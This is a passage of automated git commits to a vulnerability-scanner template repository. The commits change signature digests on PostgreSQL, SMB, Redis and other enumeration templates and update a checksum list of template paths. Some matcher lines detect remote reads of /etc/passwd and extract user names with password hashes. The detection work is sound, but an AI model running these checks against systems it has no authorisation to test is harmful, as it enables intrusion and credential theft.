4a0a0047304502207ee186539b23e1011c6c06e795e9d29565f03dd10a8c64d5e7eccfd234ab3c1a022100b3912d95b97e95a84d7c541ecab9af2278ba746f234f55032e0788084ad87629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml index 828a5190aa..e60cccde89 100644 --- a/javascript/enumeration/pgsql/pgsql-default-db.yaml +++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml @@ -54,4 +54,4 @@ javascript: - "success == true" - "response == true" condition: and -# digest: 4a0a00473045022100f0e2df6a76382a76647e8fb5709d54d81b52c58316dc822bb79619fe8fe674e502204fa4c077232db3aed0d54b3ceedb4fd63b852643682274ded7b5a3abd725059f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014d6608bd7ea565dcfcc03737ba47f182ca0615eb058fb9d28b9cac8b4cd85270221009d47da500ce31d5579ad08f02cdf8974381cb167e3368a3333b34a4ccea9c66a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml index f12def1f40..a8e4a1f405 100644 --- a/javascript/enumeration/pgsql/pgsql-file-read.yaml +++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml @@ -47,4 +47,4 @@ javascript: - type: json json: - '.Rows[].pg_ls_dir' -# digest: 4a0a00473045022055f2bfd69954bbe89c0a09641137c6ca6a3058fa4a65b82096fcd5f9d1d365e80221008607bfa79b4fb7aafb9d6a10c63bf48f0c7b8121bf691d6f0abe5ad3bebaedb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7afefaae5177a8573504103ab2a4b686d440dc99d3521846fe9479b81f6e10d022100e22bf2701c5f90426ec03c0fad5428a1a70196689a8478131a0f9f56fdb7d6fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml index 0c72259889..53e9782660 100644 --- a/javascript/enumeration/pgsql/pgsql-list-database.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml @@ -48,4 +48,4 @@ javascript: - type: json json: - '.Rows[].datname' -# digest: 4a0a0047304502202a9ac9ae53e00f334f110df2b9ea9e5505c76a361e91cf72cd1295f53864a3fd022100e07fd8e28bbc7292dd0b3b86acfe064187b48fb8354af3a0f109a3367ff34416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5b5ed4542e5eeb1579775fd172af974906ef48a370def87277cabd7c0e4284f022056b00afe8b7e115699e033df178b8358e9c838f246a4721906fbeb4978c3fdf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml index 0d2ad7056c..80e89c82ef 100644 --- a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml @@ -49,4 +49,4 @@ javascript: - type: json json: - '.Rows[] | "\(.usename) : \(.passwd)"' -# digest: 4b0a00483046022100eadfce2997111bfea81cb5e320364402b711a35bffcf2da9e7698419a2d02932022100984ef022c43f4883f758a43178f6817e3fb6ec4df6b91f59bb037aad300028d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220427e4e6aadd09fce565b7cb45062d7faa462dc0cc6587c5be003c892009901470220112798562e3ef895ec091e37c6d33d1ae44b2dcbdbd3fa75ef7964a2cd2be868:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml index 06ebbe4189..bf04c79a99 100644 --- a/javascript/enumeration/pgsql/pgsql-list-users.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml @@ -47,4 +47,4 @@ javascript: - type: json json: - '.Rows[].usename' -# digest: 4a0a004730450221009968c6a32d528f754ec6138bd6975500fa3be1e5617b932e966baa0fb4c1db09022044e3918c8bfc3f3762e42de5ffc65307a5a8bf398d2b8758a583ac0f8b91537f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a05acfa94a9b968805487fde6d1984d5a253a25643aa0337dc3be2ca9df8aad02201ee397282381f3d413f0db620a3854779fa424a142d01bdd38fc9e20cbe8b3fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml index c0d11f1656..b31cc75aaf 100644 --- a/javascript/enumeration/pgsql/pgsql-version-detect.yaml +++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml @@ -48,4 +48,4 @@ javascript: - type: json json: - '.Rows[0].version' -# digest: 490a0046304402205b1d0eba6343290231420c39a35a31b35cec9061fd4ab10aea0bcb34820d358e02204d5276d2fa1052c85a774d6893728d33a153b309d415f0ed82532bc45172b4ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e89ba570cbf1641137211ed4c440bb25ca7b51a87096c84701113fc279e5dc602204f4c089432d6f7fe651ea17f61ccddc0d396789b24a47e41d1433280d98210a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml index 8e9c3645c0..779fc5c251 100644 --- a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml +++ b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml @@ -46,4 +46,4 @@ javascript: name: dsl: - response -# digest: 490a0046304402206223942fc9db65ba597bbfe3dff6c740682b72facc4a5aca082b4dd0617a98900220776701bd49d2506927fdf0dc468b452a7f5a8ac17dc2ca53bc18b48b9c1942b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ee9fb4328d4c7601dcd2216a6d20addbf5330be29a7dacc18ebadd9d98ec60c022100e0bbcf935dd62250ed205d1fdaf7c6ce1bc8188cac860752df55c8b5320b61ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/redis/redis-info.yaml b/javascript/enumeration/redis/redis-info.yaml index 5ba6ca9341..e4ca4f66d4 100644 --- a/javascript/enumeration/redis/redis-info.yaml +++ b/javascript/enumeration/redis/redis-info.yaml @@ -51,4 +51,4 @@ javascript: - connected_slaves:(\d+) - used_memory_human:(\d+\.\d+[KMGTPEZY]?) - role:(\w+) -# digest: 4b0a0048304602210095932719db8fcff3d52ee421d063089bf07192a5a0065d3b7a6c3b036a66d249022100c314e177086cc5db933282f514fe0001b5f86e6c95d557af18165d1dc7ef95bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203601980eeccf44ef6a2d2618c6198fa2efd4cbc504caf3b8c0fdf99840330b8802203d030a47d8bfc92668c8e33248cf136937451e613d7f5c1cb01381e35ef2221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/redis/redis-require-auth.yaml b/javascript/enumeration/redis/redis-require-auth.yaml index fb326c1ca3..22f422d6e3 100644 --- a/javascript/enumeration/redis/redis-require-auth.yaml +++ b/javascript/enumeration/redis/redis-require-auth.yaml @@ -41,4 +41,4 @@ javascript: - type: dsl dsl: - "success == true" -# digest: 4a0a0047304502201ec8165e310799c9c7f1f1f71d9dde254c00e9a9c1b9d633407b971a0d3879e9022100fc3744d78e7237bdb59bb50138f0def84ac72c44b31d440cd8a5ef7e69bb68c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fd94f40e9e057e45f7164d2c23055cd280cd5ecf2d7079066c7b26185bdc140f02201c0797b3ee67e0b6fdef347fb52715c0c310bf79b1ad11eb6d138576908601a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/rsync/rsync-list-modules.yaml b/javascript/enumeration/rsync/rsync-list-modules.yaml index d42a51740d..e801e415ce 100644 --- a/javascript/enumeration/rsync/rsync-list-modules.yaml +++ b/javascript/enumeration/rsync/rsync-list-modules.yaml @@ -48,4 +48,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022100c760cea77716dfdf2262be81b9049b469cdcc2b3ee4c3ce89f098ada1a19636702203724981eb376e7fbf9a5d59a7749785e731293d31911f349299ca8d759495cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206090a0958315649123a7e861812a59815fbce401dd5f14f8f3cd13aec5dd85bb02201db117ee4dc61f18d8713461a3d2a17e12aaa73ca32863e5d7c076cc0e448936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/rsync/rsync-version.yaml b/javascript/enumeration/rsync/rsync-version.yaml index fa0d3adf9b..425c8da4f7 100644 --- a/javascript/enumeration/rsync/rsync-version.yaml +++ b/javascript/enumeration/rsync/rsync-version.yaml @@ -34,4 +34,4 @@ javascript: name: version json: - .Banner -# digest: 4a0a00473045022100d5d88230cc84b8682db4270861d4840ebc0a546f2bba07ddba1a0460dd457bfd0220133c0b8dc6e8297dabce456c45b5fa9afa6f7f56a9561a71779ed1ac98a724e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b964261345d31c6c217ba68f7cf576d22f686b36ad2f54b673db48c989f2a6340220513cf2fdb0d242f962891edd0babd162e9f13a4a744739c14ca0fc3536656574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml index 4d5cb7b8d7..84083a46fd 100644 --- a/javascript/enumeration/smb/smb-default-creds.yaml +++ b/javascript/enumeration/smb/smb-default-creds.yaml @@ -49,4 +49,4 @@ javascript: - 'response != "[]"' - 'success == true' condition: and -# digest: 4a0a0047304502210084fda53cac141dc9c521ddec90872b227f5bc050add7f62f108345ad22666b1402203bba01eaca0cff4e774eb518f9b0333228f650b3c818877110441479a3f597aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086cb1464c3d36a47f2e711bf17c506ff32e1c12d20eab783ebac596af3295d2e022016c2ffe75250f83620245fcdcdf1890193fa562e11436fff29e4fddba1f7b6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml index 4ad13ed913..9441cbbae0 100644 --- a/javascript/enumeration/smb/smb-enum-domains.yaml +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -43,4 +43,4 @@ javascript: - type: json json: - '"DomainName: "+ .DNSDomainName ' -# digest: 4a0a00473045022100d8fce979c08ce14ebb597411a9e84a004b9e5acd7ed54eed1d5c7cf76330404c02207d1fb84dc54f6612d2fc223c13ca0005e6635c2b6ed76f51b7829fdac23a221d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe17d4640cbdd92068ad03e6b784cc95928887776173f7cdc8fc3dc8736fe948022100e4151a5f3022a37819797845e756e78744616ea564461dc2f37f688d53b2e4dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/smb/smb-enum.yaml b/javascript/enumeration/smb/smb-enum.yaml index 6a40dca5b2..65f8324089 100644 --- a/javascript/enumeration/smb/smb-enum.yaml +++ b/javascript/enumeration/smb/smb-enum.yaml @@ -83,4 +83,4 @@ javascript: - '"DNSComputerNamen: "+ .DNSComputerName ' - '"DNSComputerName: "+ .DNSComputerName ' - '"ForestName: "+ .ForestName' -# digest: 4b0a00483046022100d930e61edf352b21f91282b3ecb4739c866e76e8dd54c265d31f72870469ed44022100ea80f2669f97b3f26af4ad8d1152369d7bf4038e6ef569080fef5e43d8d8b57d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b906cc86c04f5f443faa3eea18979f4364c9af155e98c7e1ef40e6e10d08643802205b356ba3fb519dc354509b07c9f187a27c233acf2609712f1a37e8c141b043ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml index b279a0a4ca..fab50e528c 100644 --- a/javascript/enumeration/smb/smb-os-detect.yaml +++ b/javascript/enumeration/smb/smb-os-detect.yaml @@ -161,4 +161,4 @@ javascript: - type: dsl dsl: - response -# digest: 490a00463044022068b53d8a814a84d415a4a1db84a447e3609938eec247464bd4851976bbcda9a50220546a04fb517b22fe0115217b9bc8bf8429d3c9e906bcd476d8b2ae1b1f7b6da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006d578fd8c5888766a1d4b72a86bcafec64d867c2a60c307102fcad2d94f9549022002b182f2412068f05d5a4e1b06dcbc6cd977231610d40a06fc6d9cccec7feb86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index 1fb9c33452..8c86c177e8 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -36,4 +36,4 @@ javascript: name: smb-version json: - '.Version.VerString' -# digest: 4a0a00473045022023cebe3ce16e51f7fd9a12715b9882ce1e88067b9d48a054fe9c12012802a3a8022100dff5e39dfa527dab4ab699daa509b1c09a33da43157daae29fa4b464dc476f1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047126b3786079856972f350210e2552381cd1e7b5db6f722885b2ae7a7347d24022100c4eb44bd83b973b08157cb82d447c7cdab5a86a96a553d868b0316e8688f659b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/smb/smb2-capabilities.yaml b/javascript/enumeration/smb/smb2-capabilities.yaml index 6f190072d3..de42dae40b 100644 --- a/javascript/enumeration/smb/smb2-capabilities.yaml +++ b/javascript/enumeration/smb/smb2-capabilities.yaml @@ -33,4 +33,4 @@ javascript: part: response json: - '.Capabilities | with_entries(select(.value == true)) | keys' -# digest: 4a0a00473045022100c7ba43506f7d74dc00810bb87f807b413a9896a6a7a760b1d1ce614f726665810220487117a0c2b182d08752a924512d377af329e32c93672352e8cd31807819c2bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb4f00235612f7ea337a67e0f0b4749e595e21967d3167c70ffe9b65ecbb6809022057d0d7f4d89913737cb799c8c19ce319e4cc4d21ebbc86a707226e7830b13138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/smb/smb2-server-time.yaml b/javascript/enumeration/smb/smb2-server-time.yaml index 40311b77c1..9d21d186ec 100644 --- a/javascript/enumeration/smb/smb2-server-time.yaml +++ b/javascript/enumeration/smb/smb2-server-time.yaml @@ -41,4 +41,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a004730450221009a460623dfe3b876809643208d5dd756b39b08e0ba9a8040ec11f6f68c5ab7d402206a5c54e7c9ac8346d85da302a7ca144a4ad8982dede08376aff972041af6d629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022013006e9d06b0b532467ee26837a9b73a8860f68b0a9273b3a86432011dc6a703022100a0e955c3bdf25e5b8d0ceb05347c41d56971f7378e4dae09307c768ddf8aa980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/misconfiguration/mysql/mysql-empty-password.yaml b/javascript/misconfiguration/mysql/mysql-empty-password.yaml index 305deae92a..b388577059 100644 --- a/javascript/misconfiguration/mysql/mysql-empty-password.yaml +++ b/javascript/misconfiguration/mysql/mysql-empty-password.yaml @@ -37,4 +37,4 @@ javascript: - "response == true" - "success == true" condition: and -# digest: 4a0a00473045022062a344098a63a6015864a65b51d9eccf5a751d1c23fb84e3ffbeff23e488f917022100a2119a4fdd5adcc599ecbfeedd09c43a91977b92d69ea0a77e2d986c5043dce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bf8e2005273801e14f090a1d92a5e3846617dc81a082eee32f7a3a362e76bda022100d9add9d77d14ada3782f0f7535f5e66d942033225f9c31a47a78fbd3979473de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml b/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml index 9e6d14b5e7..484e705526 100644 --- a/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml +++ b/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml @@ -35,4 +35,4 @@ javascript: - "success == true" - "response == true" condition: and -# digest: 4b0a00483046022100c41f1f8bb8de60be5381d7052e6c77ad73f27054ea9d902521b0e329ec680285022100fd672f62deb4391db2aad9e1e2761026e9f8c83fd218b6d8a0483c6919ced3ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ee2a786d94cd9a5bfdeab831b3ca79e72354e11f29b19fd2132991e46423a0502210093d8139f95431d620b8836105fc8911ac75324b2ce638441cc5b7fce5b409740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml index f149107cb0..4717c7237b 100644 --- a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml +++ b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml @@ -51,4 +51,4 @@ javascript: part: interactsh_request regex: - "root:[x*]:0:0:" -# digest: 4b0a00483046022100ccc9ea07752141bcfc8fcc5b43173f20c69e8c9431bc9a696641fdadb87de6f2022100f4da0cf0cb1d777e1a2206d08544dd36d8a486e2bce037f7ec40789aa46c4031:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ed51c19bc525ad32d717538137e6bcb2afc2ddbde9477244979238ec41a045a02201eef224ae8259f455d3ace353231019d308451f72716924b3ad7c0ed4560da20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/misconfiguration/smb/smb-anonymous-access.yaml b/javascript/misconfiguration/smb/smb-anonymous-access.yaml index 749e9f8d7e..8d706e9231 100644 --- a/javascript/misconfiguration/smb/smb-anonymous-access.yaml +++ b/javascript/misconfiguration/smb/smb-anonymous-access.yaml @@ -41,4 +41,4 @@ javascript: - type: json json: - '.[]' -# digest: 4b0a00483046022100c87a7ef895da8ef7c6097ebd4f69aa24ccd1dd03e58cc759e8539a2abdf28bdd022100832a5bb1790d181273d09a2702cbd2f5cf88678aff41a1705e0fccaf48830a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054e291065731be08db0f467d16e3bea0dd83865a9d47333e44f6460bfcb83993022000a5d186a708daafc6bb7c13eca8894bd5a4c17cba1c6c4d5adbd1118f6205b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/misconfiguration/smb/smb-shares.yaml b/javascript/misconfiguration/smb/smb-shares.yaml index 2394816c01..ae3757d006 100644 --- a/javascript/misconfiguration/smb/smb-shares.yaml +++ b/javascript/misconfiguration/smb/smb-shares.yaml @@ -34,4 +34,4 @@ javascript: - type: json json: - '.[]' -# digest: 4b0a00483046022100f49d6b9751a35e596ae81126ec65762d22c0f1775bca0989eac1508db68b1441022100dddb98ddddc79e64727d25687f46ec61539d541a4a48877dd87f2d3312f58785:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac8f9fd001b61f68f2bb3b4cf7567ff25af89c95c1a993d2ca4d3af4f2d8bfd20220610e8f2d46ae1d324c92d9396069ba130aa5542d034a46524c904ec1bd426034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/misconfiguration/smb/smb-signing-not-required.yaml b/javascript/misconfiguration/smb/smb-signing-not-required.yaml index bc1cddccda..05b65de847 100644 --- a/javascript/misconfiguration/smb/smb-signing-not-required.yaml +++ b/javascript/misconfiguration/smb/smb-signing-not-required.yaml @@ -37,4 +37,4 @@ javascript: - '"SigningEnabled": true' - '"SigningRequired": false' condition: and -# digest: 4a0a004730450220434f70fdc44f00edbcefb8deb5b9441188832775b28b111ba4221b15ab230e2f0221008375cd6f5a92fd203e0d5271b85044072b17f0b5adff168d7f76120608434e18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d8252d6802270bcc36f77cbed42332eaec44cc0ad40870a7b49a2ba6bb7dd030220013be553516dc0a03a1681e64957bc0fc910b8306dbdc6aa66305b6d38274ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 5f889a2468..4dcf989e3f 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -33,4 +33,4 @@ javascript: - type: word words: - "Unknown transfer ID" -# digest: 4a0a0047304502204489409b36fcca97d8fd8b77084257f680c00daabfe059c4e271def257889230022100f055193f6473b2b58dcb7994d456832eda84da21e2e9bb08917b5bb5bfb8dff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c512c1a23c479681469c4b6a1e1e7a5740dfee043f58cb2a1d79767822cbb32802203dfa42884afa515fb2ac6dd0e0075422bc1f3ece618c6538164c8b9b09062e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7d502c82519019beca1c6ab1b20b237400d40a70 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 12:49:31 +0000 Subject: [PATCH 1082/1841] Auto Generated New Template Addition List [Wed Jul 10 12:49:31 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 456cce918e..27ea1e9e24 100644 --- a/.new-additions +++ b/.new-additions @@ -68,6 +68,7 @@ http/vulnerabilities/next-js-cache-poisoning.yaml http/vulnerabilities/other/azon-dominator-sqli.yaml http/vulnerabilities/other/bagisto-csti.yaml http/vulnerabilities/other/crocus-lfi.yaml +http/vulnerabilities/other/enjoyrmis-sqli.yaml http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml http/vulnerabilities/other/pingsheng-electronic-sqli.yaml http/vulnerabilities/other/sharp-printers-lfi.yaml From 14c7159db85aafdb86cfa4de0271aac3f702202c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 12:50:08 +0000 Subject: [PATCH 1083/1841] Auto Generated Templates Checksum [Wed Jul 10 12:50:08 UTC 2024] :robot: --- templates-checksum.txt | 93 +++++++++++++++++++++--------------------- 1 file changed, 47 insertions(+), 46 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 11d6e639ee..ff788488c7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8009,6 +8009,7 @@ http/vulnerabilities/other/elFinder-path-traversal.yaml:9c9ea74d1312aada35ec1821 http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:7b2eac74efc5e020858690936c34ea3c3879b3f9 http/vulnerabilities/other/empirecms-xss.yaml:1dd42b3c178c08112a55a795637916ae0ad19302 http/vulnerabilities/other/ems-sqli.yaml:5041a04bd1dddfaa7461e369509b318dda871c4d +http/vulnerabilities/other/enjoyrmis-sqli.yaml:577035f2527555a69ee341462e68485e54748a8d http/vulnerabilities/other/ep-web-cms-xss.yaml:9b9f26659fe3486aeb093bff5874b1f9900df616 http/vulnerabilities/other/epp-server-lfi.yaml:73d70e01fa3888f4152dddbf72025699ec7a7cda http/vulnerabilities/other/erensoft-sqli.yaml:2db8e70b395c704b4ba339d911330f5fd8d5ae23 @@ -8621,67 +8622,67 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:fe9fe6bf3d7f27b2f5297126714f53c3 http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac80eca48e3eb64691 http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b -javascript/audit/mysql/mysql-load-file.yaml:69a6c8b510723ee3dd91fa9fbc15bc8c49c82d96 -javascript/backdoor/proftpd-backdoor.yaml:a01f25000d3f484d8969dfda5973250096076c4f -javascript/cves/2012/CVE-2012-2122.yaml:73dcc56ec0cdddd72d861002cf190a82eb7905a1 -javascript/cves/2016/CVE-2016-8706.yaml:f1389da5abd6b1351b43f9ac3f5bcaa46d098084 -javascript/cves/2019/CVE-2019-9193.yaml:19b707e4fb0a6f20584109de82e07d15969c4db7 -javascript/cves/2020/CVE-2020-7247.yaml:75a602d700d9ff17184c223b663fc31fa68725a2 +javascript/audit/mysql/mysql-load-file.yaml:2c1d3fde3869a82e7543d201bb449cf068923cb0 +javascript/backdoor/proftpd-backdoor.yaml:2be65d7d1d67a47dfefb142a289fff8294d971a9 +javascript/cves/2012/CVE-2012-2122.yaml:fc6a980e71858cfb6c3ccb113663a6adc0fcd47d +javascript/cves/2016/CVE-2016-8706.yaml:b28fc440036c4410f4bc2154c5c20943fef0a4db +javascript/cves/2019/CVE-2019-9193.yaml:fbe6577e6d19b23da82d3210e9a41c79062ecf60 +javascript/cves/2020/CVE-2020-7247.yaml:4b69f08fbef74779850f4ef8a81e91bfbf4a387a javascript/cves/2023/CVE-2023-34039.yaml:44c16d645d9008bce58aaff587f1c1780464946c -javascript/cves/2023/CVE-2023-46604.yaml:5595de1d175eda6efbb7f0af3db7c0d16495b5e6 -javascript/cves/2023/CVE-2023-48795.yaml:a52e039bc67f590f9f47bc809565b83b8084df1a -javascript/cves/2024/CVE-2024-23897.yaml:db0b2471d9a6c5b7fcadc252d32db86c17bc9f08 +javascript/cves/2023/CVE-2023-46604.yaml:c27b5604c33956e48e94c138aac183c87080d8d3 +javascript/cves/2023/CVE-2023-48795.yaml:582b36cd13217b59d522114f7787b8f11ccd5c63 +javascript/cves/2024/CVE-2024-23897.yaml:0371995e15de94f3f3fd8723b83522f4b1c0f14f javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad -javascript/default-logins/redis-default-logins.yaml:45255a761f5c94df1b8afe8506bc9b9f5b623ca2 +javascript/default-logins/redis-default-logins.yaml:94bc6aea27f0f07f41834001f2efd51758a8ac2b javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 -javascript/detection/oracle-tns-listener.yaml:bba4551124defe4dbd6ca7613426e951f5ad5c7b -javascript/detection/samba-detect.yaml:9e370170c601928c9b8d7e003696ca4f785e0fd6 -javascript/detection/ssh-auth-methods.yaml:5d9747b7181e9eef26185078b674f73c767fe079 -javascript/enumeration/checkpoint-firewall-enum.yaml:fd51dfe56269719666eab5c98192b7db36bdad68 -javascript/enumeration/ldap/ldap-metadata.yaml:05a27f84d4265c41836935525f69a8f05dbe2663 +javascript/detection/oracle-tns-listener.yaml:22422a4d4104d0af98420fb8b2207b8eab8a8ab9 +javascript/detection/samba-detect.yaml:58ae5e9f3fa51624995c4060fccc13dfde9cbe59 +javascript/detection/ssh-auth-methods.yaml:c42ab280f2285a5cc2edcb75ba45bbebc0e01874 +javascript/enumeration/checkpoint-firewall-enum.yaml:8d7c249d110dbbe18e6dad9b67cb5f70d4fe5931 +javascript/enumeration/ldap/ldap-metadata.yaml:02c4bddb6f9fc5cb5262f4f8cece729cf4fd6e95 javascript/enumeration/minecraft-enum.yaml:86520064cf23ae09b9ce6a2ec23f29abaeb9eb5e -javascript/enumeration/mysql/mysql-default-login.yaml:bcdf8851a245cc5be171ae783c13913cb09e433e -javascript/enumeration/mysql/mysql-info.yaml:0734a1e1e76a6c095b2ce7455c900d991bc90e73 -javascript/enumeration/mysql/mysql-show-databases.yaml:5a11b9d7be68ed60eeada8dccb934c1c01b4ecb3 -javascript/enumeration/mysql/mysql-show-variables.yaml:62a2339c9c7d5e316f5ddcb9015150f64ffdfc83 -javascript/enumeration/mysql/mysql-user-enum.yaml:3100c39a9fa862e6bfd3d25c16d570d9cf8478c0 -javascript/enumeration/pgsql/pgsql-default-db.yaml:38f113a54c8c3045cedc218f7364a3f84a379499 -javascript/enumeration/pgsql/pgsql-file-read.yaml:88047ed9410e773fcfa25699d50472b564dfb8ea -javascript/enumeration/pgsql/pgsql-list-database.yaml:7a9f013941ba7dfd4a8bab13fd1bf43017dbd9d5 -javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:b4dbaaa48538af841b524fc3bfe06bef3f615fe0 -javascript/enumeration/pgsql/pgsql-list-users.yaml:9ac520a60e35c13eb8352dcc132a1303a4e29db7 -javascript/enumeration/pgsql/pgsql-version-detect.yaml:a5a800437f53099260c5c42b2c5ca8acab88b0f9 -javascript/enumeration/pop3/pop3-capabilities-enum.yaml:e9f3c2672835cb9957121930158fead0c492a234 -javascript/enumeration/redis/redis-info.yaml:8018676013089658062caa3b34bfa1436886debd -javascript/enumeration/redis/redis-require-auth.yaml:5c1e902ef817bb3386272f5e56ad35c7eabc3670 